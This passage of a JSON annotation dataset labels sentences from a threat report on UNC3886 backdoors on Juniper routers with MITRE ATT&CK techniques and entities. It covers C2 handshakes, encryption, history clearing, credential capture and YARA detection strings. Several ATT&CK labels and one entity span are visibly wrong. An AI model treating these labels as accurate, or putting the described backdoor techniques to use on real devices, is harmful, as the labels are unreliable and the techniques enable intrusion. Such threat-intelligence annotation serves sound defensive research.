"93_mitre_report", "page_number": 1, "sentence_id": 117, "context_before": "This implementation has a bug in it where it doesn't properly retrieve a final state box value during its PRGA generation.", "sentence_text": "The following key is used for the traffic encryption:\n4fd37426-65dd-4a8d-8ba6-1382a011dae9\nThe attacker initiates the connection to the backdoor by sending a magic value 0xDEADBEEF .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "attacker initiates the connection to the backdoor by sending a magic value 0xDEADBEEF", "entities": [ { "text": "attacker", "start": 95, "end": 103, "label": "ThreatActor" }, { "text": "backdoor", "start": 136, "end": 144, "label": "MalwareTool" }, { "text": "4fd37426-65dd-4a8d-8ba6-1382a011dae9", "start": 54, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "magic value 0xDEADBEEF", "start": 158, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "used", "start": 21, "end": 25, "label": "Action" }, { "text": "initiates the connection", "start": 104, "end": 128, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s118-269c26", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 118, "context_before": "The following key is used for the traffic encryption:\n4fd37426-65dd-4a8d-8ba6-1382a011dae9\nThe attacker initiates the connection to the backdoor by sending a magic value 0xDEADBEEF .", "sentence_text": "The malware responds to this message by sending the same message in response, encrypted with custom RC4.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "malware responds to this message by sending the same message in response, encrypted with custom RC4", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "custom RC4", "start": 93, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "responds to this message by sending the same message in response", "start": 12, "end": 76, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s119-958dac", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 119, "context_before": "The malware responds to this message by sending the same message in response, encrypted with custom RC4.", "sentence_text": "The malware will then send the process ID (pid) of its own process to the C2.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" }, { "id": "T1033", "name": "System Owner/User Discovery" } ], "procedure": "malware sends its process ID (pid) to the C2", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "C2", "start": 74, "end": 76, "label": "Infrastructure_Indicator" }, { "text": "send the process ID (pid) of its own process", "start": 22, "end": 66, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s120-fec50b", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 120, "context_before": "The malware will then send the process ID (pid) of its own process to the C2.", "sentence_text": "After the initial beacon the malware waits for additional commands.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "malware waits for additional commands after initial beacon", "entities": [ { "text": "malware", "start": 29, "end": 36, "label": "MalwareTool" }, { "text": "waits for additional commands", "start": 37, "end": 66, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s121-745355", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 121, "context_before": "After the initial beacon the malware waits for additional commands.", "sentence_text": "The backdoor receives the C2 address and port by binding on specific network interfaces.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "backdoor receives the C2 address and port by binding on specific network interfaces", "entities": [ { "text": "ackdoor", "start": 5, "end": 12, "label": "MalwareTool" }, { "text": "C2 address and port", "start": 26, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "specific network interfaces", "start": 60, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "receives", "start": 13, "end": 21, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s122-654b1a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 122, "context_before": "The backdoor receives the C2 address and port by binding on specific network interfaces.", "sentence_text": "Network interfaces are stored in an environment variable.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Network interfaces are stored in an environment variable", "entities": [ { "text": "Network interfaces", "start": 0, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "environment variable", "start": 36, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "stored", "start": 23, "end": 29, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s123-428e4a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 123, "context_before": "Network interfaces are stored in an environment variable.", "sentence_text": "The backdoor communicates with the C2 over TCP.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "communicates with the C2 over TCP", "entities": [ { "text": "C2", "start": 35, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "TCP", "start": 43, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "communicates", "start": 13, "end": 25, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s124-2fb76d", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 124, "context_before": "The backdoor communicates with the C2 over TCP.", "sentence_text": "Communication with C2 is AES-encrypted and XOR-encoded.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Communication with C2 is AES-encrypted and XOR-encoded.", "entities": [ { "text": "C2", "label": "Infrastructure_Indicator", "start": 19, "end": 21 }, { "text": "Communication with C2 is AES-encrypted and XOR-encoded", "label": "Action", "start": 0, "end": 54 } ] }, { "uid": "mitre-93_mitre_report-p1-s125-22f0e1", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 125, "context_before": "Communication with C2 is AES-encrypted and XOR-encoded.", "sentence_text": "The malware configuration is stored in the following environment variables:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s126-2c4a93", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 126, "context_before": "The malware configuration is stored in the following environment variables:", "sentence_text": "INTFS\n: The network interfaces' names to bind to.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s127-d83336", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 127, "context_before": "INTFS\n: The network interfaces' names to bind to.", "sentence_text": "RTS\n: The routing addresses to bind to (instead of interfaces).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s128-0e6907", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 128, "context_before": "RTS\n: The routing addresses to bind to (instead of interfaces).", "sentence_text": "UPRT\n: The port to bind to (if not specified, is used)\nDAEMON\n: Run the sample in the background.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s129-f6ed05", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 129, "context_before": "UPRT\n: The port to bind to (if not specified, is used)\nDAEMON\n: Run the sample in the background.", "sentence_text": "During initialization, malware executes following command to retrieve local-index number of an interface specified in the INTFS environment variable:\nifinfo '' | grep local-index | grep -Eo '[0-9]+' After setting up a local UDP socket, malware binds to 0.0.0.0: on the specified interfaces and waits for the attacker to send the C2 address and port.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "binds to 0.0.0.0: on the specified interfaces", "entities": [ { "text": "malware", "start": 23, "end": 30, "label": "MalwareTool" }, { "text": "executes", "start": 31, "end": 39, "label": "Action" }, { "text": "binds to 0.0.0.0", "start": 255, "end": 271, "label": "Action" }, { "text": "waits", "start": 311, "end": 316, "label": "Action" }, { "text": "attacker", "start": 325, "end": 333, "label": "ThreatActor" }, { "text": "INTFS environment", "start": 122, "end": 139, "label": "Infrastructure_Indicator" }, { "text": "C2", "start": 346, "end": 348, "label": "Infrastructure_Indicator" }, { "text": "UDP", "start": 235, "end": 238, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s130-46c1ff", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 130, "context_before": "During initialization, malware executes following command to retrieve local-index number of an interface specified in the INTFS environment variable:\nifinfo '' | grep local-index | grep -Eo '[0-9]+' After setting up a local UDP socket, malware binds to 0.0.0.0: on the specified interfaces and waits for the attacker to send the C2 address and port.", "sentence_text": "After receiving a C2 address on the UDP socket it establishes a new TCP connection to the provided target.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Receive a C2 address via UDP and establish a TCP connection to the specified target.", "entities": [ { "text": "receiving a C2 address", "start": 6, "end": 28, "label": "Action" }, { "text": "establishes a new TCP connection", "start": 50, "end": 82, "label": "Action" }, { "text": "C2 address", "start": 18, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s131-d4e3e4", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 131, "context_before": "After receiving a C2 address on the UDP socket it establishes a new TCP connection to the provided target.", "sentence_text": "Malware supports a set of standard TINYSHELL commands:\n: Upload a file.\n:", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Malware provides TINYSHELL commands enabling file upload to the attacker-controlled endpoint.", "entities": [ { "text": "Malware", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "Upload a file", "start": 57, "end": 70, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s132-8eb12f", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 132, "context_before": "Malware supports a set of standard TINYSHELL commands:\n: Upload a file.\n:", "sentence_text": "Download a file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s133-3ae559", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 133, "context_before": "Download a file.", "sentence_text": ": Execute a shell command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s134-d0356c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 134, "context_before": ": Execute a shell command.", "sentence_text": "When executing shell commands, the malware clears the HISTFILE environment variable and allows the attacker to specify the TERM value.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.003", "name": "Clear Command History" } ], "procedure": "clears the HISTFILE environment variable", "entities": [ { "text": "attacker", "start": 99, "end": 107, "label": "ThreatActor" }, { "text": "malware", "start": 35, "end": 42, "label": "MalwareTool" }, { "text": "HISTFILE", "start": 54, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "TERM", "start": 123, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "clears", "start": 43, "end": 49, "label": "Action" }, { "text": "specify", "start": 111, "end": 118, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s135-608b9b", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 135, "context_before": "When executing shell commands, the malware clears the HISTFILE environment variable and allows the attacker to specify the TERM value.", "sentence_text": "Running these samples on a standard FreeBSD system would return an invalid socket, hence we believe this to be a JunosOS specific implementation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497", "name": "Virtualization/Sandbox Evasion" } ], "procedure": "Running samples on a standard FreeBSD system would return an invalid socket (Anti-Analysis check)", "entities": [ { "text": "FreeBSD", "start": 36, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "JunosOS", "start": 113, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "Running", "start": 0, "end": 7, "label": "Action" }, { "text": "return an invalid socket", "start": 57, "end": 81, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s136-3f4a09", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 136, "context_before": "Running these samples on a standard FreeBSD system would return an invalid socket, hence we believe this to be a JunosOS specific implementation.", "sentence_text": "We believe that this socket is used to establish a connection for communicating with the operating system's routing subsystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s137-d865be", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 137, "context_before": "We believe that this socket is used to establish a connection for communicating with the operating system's routing subsystem.", "sentence_text": "This socket is used to read and write a packet similar in structure to rt_* messages on OpenBSD to retrieve the interface index.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "read and write a packet similar to rt_* messages on OpenBSD to retrieve the interface index", "entities": [ { "text": "OpenBSD", "start": 88, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "socket", "start": 5, "end": 11, "label": "Infrastructure_Indicator" }, { "text": "read", "start": 23, "end": 27, "label": "Action" }, { "text": "write", "start": 32, "end": 37, "label": "Action" }, { "text": "retrieve", "start": 99, "end": 107, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s138-875eb0", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 138, "context_before": "This socket is used to read and write a packet similar in structure to rt_* messages on OpenBSD to retrieve the interface index.", "sentence_text": "The custom message contains an interface name and a logical sub interface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s139-20f532", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 139, "context_before": "The custom message contains an interface name and a logical sub interface.", "sentence_text": "The interface index value is then passed into a setsockopt call for a command and control socket either TCP or UDP.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "passed into a setsockopt call for a command and control socket", "entities": [ { "text": "UDP", "start": 111, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "TCP", "start": 104, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "socket", "start": 90, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "passed", "start": 34, "end": 40, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s140-71f7d0", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 140, "context_before": "The interface index value is then passed into a setsockopt call for a command and control socket either TCP or UDP.", "sentence_text": "Activity in Linux Environments our previous blog post as follows:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s141-c9a53a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 141, "context_before": "Activity in Linux Environments our previous blog post as follows:", "sentence_text": "Command execution and persistence using a combination of rootkits and utilities, including REPTILE and MEDUSA with SEAELF loader , and BUSYBOX Instead of using the publicly available kubo/injector as noted previously, Mandiant observed UNC3886 deployed PITHOOK along with a custom SSH server based on the publicly available wzshiming/sshd project to hijack SSH authentications and capture SSH credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" } ], "procedure": "hijack SSH authentications, capture SSH credentials", "entities": [ { "text": "UNC3886", "start": 236, "end": 243, "label": "ThreatActor" }, { "text": "REPTILE", "start": 91, "end": 98, "label": "MalwareTool" }, { "text": "MEDUSA", "start": 103, "end": 109, "label": "MalwareTool" }, { "text": "SEAELF", "start": 115, "end": 121, "label": "MalwareTool" }, { "text": "BUSYBOX", "start": 135, "end": 142, "label": "MalwareTool" }, { "text": "kubo/injector", "start": 183, "end": 196, "label": "MalwareTool" }, { "text": "PITHOOK", "start": 253, "end": 260, "label": "Action" }, { "text": "hijack SSH authentications", "start": 350, "end": 376, "label": "Action" }, { "text": "capture SSH credentials", "start": 381, "end": 404, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s142-be0bed", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 142, "context_before": "Command execution and persistence using a combination of rootkits and utilities, including REPTILE and MEDUSA with SEAELF loader , and BUSYBOX Instead of using the publicly available kubo/injector as noted previously, Mandiant observed UNC3886 deployed PITHOOK along with a custom SSH server based on the publicly available wzshiming/sshd project to hijack SSH authentications and capture SSH credentials.", "sentence_text": "TACACS+ daemon binary was replaced by a backdoored version of the binary with similar malicious functions for capturing credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" } ], "procedure": "replaced by a backdoored version, capturing credentials", "entities": [ { "text": "TACACS+", "start": 0, "end": 7, "label": "Infrastructure_Indicator" }, { "text": "replaced", "start": 26, "end": 34, "label": "Action" }, { "text": "capturing credentials", "start": 110, "end": 131, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s143-89213d", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 143, "context_before": "TACACS+ daemon binary was replaced by a backdoored version of the binary with similar malicious functions for capturing credentials.", "sentence_text": "Use of\nGHOSTTOWN\nmalware for anti-forensics purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s144-2200d0", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 144, "context_before": "Use of\nGHOSTTOWN\nmalware for anti-forensics purposes.", "sentence_text": "Outlook and Implications", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s145-2de7db", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 145, "context_before": "Outlook and Implications", "sentence_text": "This blog post further highlights China-nexus espionage actors  are continuing to compromise networking infrastructure with custom malware ecosystems.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "China-nexus espionage actors are continuing to compromise networking infrastructure with custom malware ecosystems", "entities": [ { "text": "China-nexus espionage actors", "start": 34, "end": 62, "label": "ThreatActor" }, { "text": "custom malware ecosystems", "start": 124, "end": 149, "label": "MalwareTool" }, { "text": "networking infrastructure", "start": 93, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "compromise", "start": 82, "end": 92, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s146-389c6f", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 146, "context_before": "This blog post further highlights China-nexus espionage actors  are continuing to compromise networking infrastructure with custom malware ecosystems.", "sentence_text": "This privileged access allowed the threat actor to enter Junos OS shell mode and perform restricted operations.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "perform restricted operations", "entities": [ { "text": "threat actor", "start": 35, "end": 47, "label": "ThreatActor" }, { "text": "Junos OS", "start": 57, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "perform restricted operations", "start": 81, "end": 110, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s147-90f06a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 147, "context_before": "This privileged access allowed the threat actor to enter Junos OS shell mode and perform restricted operations.", "sentence_text": "Investigating further actions taken by the threat actor was hampered by the challenges inherent in analyzing proprietary network devices, which required novel methods for artifact acquisition and analysis.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "threat actor's actions hampered by the challenges inherent in analyzing proprietary network devices", "entities": [ { "text": "threat actor", "start": 43, "end": 55, "label": "ThreatActor" }, { "text": "analyzing proprietary network devices", "start": 99, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "Investigating further actions taken", "start": 0, "end": 35, "label": "Action" }, { "text": "hampered by the challenges", "start": 60, "end": 86, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s148-b6aab2", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 148, "context_before": "Investigating further actions taken by the threat actor was hampered by the challenges inherent in analyzing proprietary network devices, which required novel methods for artifact acquisition and analysis.", "sentence_text": "Upgrade Juniper devices and run security checks:\nOrganizations should upgrade their Juniper devices to the latest images which contain mitigations and updated signatures for JMRT and run JMRT Quick Scan and Integrity check after the upgrade.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s149-20fcf6", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 149, "context_before": "Upgrade Juniper devices and run security checks:\nOrganizations should upgrade their Juniper devices to the latest images which contain mitigations and updated signatures for JMRT and run JMRT Quick Scan and Integrity check after the upgrade.", "sentence_text": "Secure Authentication:\nImplement a centralized Identity and Access Management (IAM) system with robust multi-factor authentication (MFA) and granular role-based access control (RBAC) for managing network devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s150-a11bcf", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 150, "context_before": "Secure Authentication:\nImplement a centralized Identity and Access Management (IAM) system with robust multi-factor authentication (MFA) and granular role-based access control (RBAC) for managing network devices.", "sentence_text": "Configuration Management:\nImplement a network configuration management that supports configuration validation against defined templates and standards, with the ability to automatically remediate deviations or trigger alerts for manual intervention.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s151-bccef9", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 151, "context_before": "Configuration Management:\nImplement a network configuration management that supports configuration validation against defined templates and standards, with the ability to automatically remediate deviations or trigger alerts for manual intervention.", "sentence_text": "Enhanced Monitoring:\nAddress and prioritize high-risk administrative activities and implement monitoring solutions with a process to regularly review the effectiveness of detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s152-6c36c6", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 152, "context_before": "Enhanced Monitoring:\nAddress and prioritize high-risk administrative activities and implement monitoring solutions with a process to regularly review the effectiveness of detection.", "sentence_text": "Vulnerability Management:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s153-604cfe", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 153, "context_before": "Vulnerability Management:", "sentence_text": "Prioritize patching and mitigation of vulnerabilities in network devices, including those in lesser-known operating systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s154-7c4be4", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 154, "context_before": "Prioritize patching and mitigation of vulnerabilities in network devices, including those in lesser-known operating systems.", "sentence_text": "Threat Intelligence:\nProactively leverage threat intelligence to continually evaluate and improve the effectiveness of security controls against emerging threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s155-660e43", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 155, "context_before": "Threat Intelligence:\nProactively leverage threat intelligence to continually evaluate and improve the effectiveness of security controls against emerging threats.", "sentence_text": "A concerted effort is required to safeguard these critical systems and ensure the continued stability and security of the internet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s156-d6217e", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 156, "context_before": "A concerted effort is required to safeguard these critical systems and ensure the continued stability and security of the internet.", "sentence_text": "Organizations potentially impacted by this campaign are strongly advised to engage .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s157-88a376", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 157, "context_before": "Organizations potentially impacted by this campaign are strongly advised to engage .", "sentence_text": "Acknowledgement\nThis analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s158-090390", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 158, "context_before": "Acknowledgement\nThis analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.", "sentence_text": "Indicators of Compromise A Google Threat Intelligence Collection of IOCs is available for registered users For Google Security Operations Enterprise+ customers, rules have been released to your Emerging Threats rule pack, and indicators of compromise (IOCs) listed in this blog post are available for prioritization with Applied Threat Intelligence Host-Based Indicators Network Indicators Detection YARA-L Rules Relevant rules are available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s159-a5e201", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 159, "context_before": "Indicators of Compromise A Google Threat Intelligence Collection of IOCs is available for registered users For Google Security Operations Enterprise+ customers, rules have been released to your Emerging Threats rule pack, and indicators of compromise (IOCs) listed in this blog post are available for prioritization with Applied Threat Intelligence Host-Based Indicators Network Indicators Detection YARA-L Rules Relevant rules are available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set.", "sentence_text": "SEAELF Installer Execution GHOSTTOWN Utility Execution REPTILE Rootkit Command Line Argument Tampering REPTILE Rootkit Cmd Component Usage REPTILE Rootkit Shell Component Usage REPTILE Rootkit Hide Command Usage YARA Rules rule M_Hunting_PacketEncryptionLayer_1 { meta:", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Execution and misuse of SEAELF, GHOSTTOWN, and REPTILE rootkit components using command-line arguments and shell", "entities": [ { "text": "SEAELF Installer", "start": 0, "end": 16, "label": "MalwareTool" }, { "text": "GHOSTTOWN Utility", "start": 27, "end": 44, "label": "MalwareTool" }, { "text": "REPTILE Rootkit", "start": 55, "end": 70, "label": "MalwareTool" }, { "text": " Execution", "start": 16, "end": 26, "label": "Action" }, { "text": "Command Line Argument Tampering ", "start": 71, "end": 103, "label": "Action" }, { "text": "Shell Component Usage", "start": 155, "end": 176, "label": "Action" }, { "text": "Hide Command Usage", "start": 193, "end": 211, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s160-2848b7", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 160, "context_before": "SEAELF Installer Execution GHOSTTOWN Utility Execution REPTILE Rootkit Command Line Argument Tampering REPTILE Rootkit Cmd Component Usage REPTILE Rootkit Shell Component Usage REPTILE Rootkit Hide Command Usage YARA Rules rule M_Hunting_PacketEncryptionLayer_1 { meta:", "sentence_text": "author = \"Mandiant\" strings:\n$pel_1 = \"pel_client_init\" $pel_2 = \"pel_server_init\" $pel_3 = \"pel_setup_context\" $pel_4 = \"pel_send_msg\" $pel_5 = \"pel_recv_msg\" $pel_6 = \"pel_send_all\" $pel_7 = \"pel_recv_all\" $pel_8 = \"pel_errno\" $pel_9 = \"pel_context\" $pel_10 = \"pel_ctx\" $pel_11 = \"send_ctx\" $pel_12 = \"recv_ctx\" condition:\n4 of ($pel_*)\n}\nrule M_Hunting_TINYSHELL_5\n{", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "TINYSHELL malware referenced by detection rule for malicious command execution.", "entities": [ { "text": "TINYSHELL", "start": 356, "end": 365, "label": "MalwareTool" } ] }, { "uid": "mitre-93_mitre_report-p1-s163-f29881", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 163, "context_before": "d6 e5 0d|", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\n11 | C2 IP Address 1 12 | C2 IP Address 2 13 | C2 IP Address 3 14 | C2 IP Address 4 2 | C2 Port Number 3 | C2 Network Interface appid | TINYSHELL | 2c89a18944d3a895bd6432415546635e", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Use of TINYSHELL malware communicating with C2 infrastructure to steal credentials and deliver malware.", "entities": [ { "text": "TINYSHELL", "start": 271, "end": 280, "label": "MalwareTool" }, { "text": " C2 Port Number 3", "start": 222, "end": 239, "label": "Infrastructure_Indicator" }, { "text": "C2 IP Address 3 14 ", "start": 182, "end": 201, "label": "Infrastructure_Indicator" }, { "text": "C2 IP Address 2 13", "start": 161, "end": 179, "label": "Infrastructure_Indicator" }, { "text": " C2 IP Address 1 12", "start": 139, 